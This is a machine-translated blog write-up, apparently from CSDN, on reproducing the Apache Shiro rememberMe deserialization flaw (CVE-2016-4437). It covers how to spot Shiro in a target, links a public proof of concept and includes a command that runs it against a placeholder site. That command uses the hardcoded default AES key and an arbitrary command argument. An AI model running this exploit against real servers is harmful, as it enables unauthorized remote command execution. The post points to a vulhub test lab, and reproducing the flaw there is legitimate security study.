Воспроизведение уязвимости удаленного выполнения команд Apache shiro

[Причина уязвимости]
В параметре Rememberme есть уязвимость десериализации. Содержимое памятки зашифровано AES. Зашифрованный ключ жестко запрограммирован в коде. Утечка ключа и зашифрованного вектора vi также можно найти через код (перед определенным полем 16 байт), любая команда может быть выполнена путем создания содержимого файла cookie
[введение shiro]
Apache Shiro — это мощная и простая в использовании среда безопасности Java, которая выполняет аутентификацию, авторизацию, пароль и управление сеансом. Используя простой для понимания API Широ, вы можете быстро и легко получить любое приложение, от самого маленького мобильного приложения до крупнейшего веб-приложения и корпоративного приложения.
[отпечаток широ]
Определить, использует ли веб-сайт широ,
чтобы определить, следует ли использовать Широ, содержит ли заголовок в ответе RememberMe
[точка уязвимости Широ]
параметр Rememberme в файле cookie
[уязвимость poc]
gitbub: https://github.com/ admintony/shiro_rememberMe_Rce
[Версия уязвимости] Меньше или равно 1.2.4
[Репродукция]
Для локальной загрузки poc требуется среда python2 и библиотека AES.Если во время установки сообщается об ошибке и ее нельзя использовать, вы можете установить ее из исходного кода сейчас.
Исходная установка

>>> import sys
>>>
>>>
>>> print(sys.path)
['', '/usr/lib64/python27.zip', '/usr/lib64/python2.7', '/usr/lib64/python2.7/plat-linux2', '/usr/lib64/python2.7/lib-tk', '/usr/lib64/python2.7/lib-old', '/usr/lib64/python2.7/lib-dynload', '/usr/lib64/python2.7/site-packages', '/usr/lib/python2.7/site-packages']   #找到python安装插件的位置 /usr/lib/python2.7/site-packages 
cd /usr/lib/python2.7/site-packages
wget https://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz
tar -zxvf pycrypto-2.6.1.tar.gz
yum install python-setuptools
pip install setuptools  #安装时有依赖关系,最好加上,反正没错
python setup.py build
python setup.py
python setup.py install #安装完毕
python shiro_rememberMe_Rce.py  http://xxx.com/ kPH+bIxk5D2deZiIxcaaaA== 'id'        #key=kPH+bIxk5D2deZiIxcaaaA==可以换,cmd=id,id可以换成任意命令

вставьте сюда описание изображения

Тестовая среда: можно использовать vunhub: https://vulhub.org/#/environments/shiro/CVE-2016-4437/

Guess you like

Origin blog.csdn.net/u013908944/article/details/110682187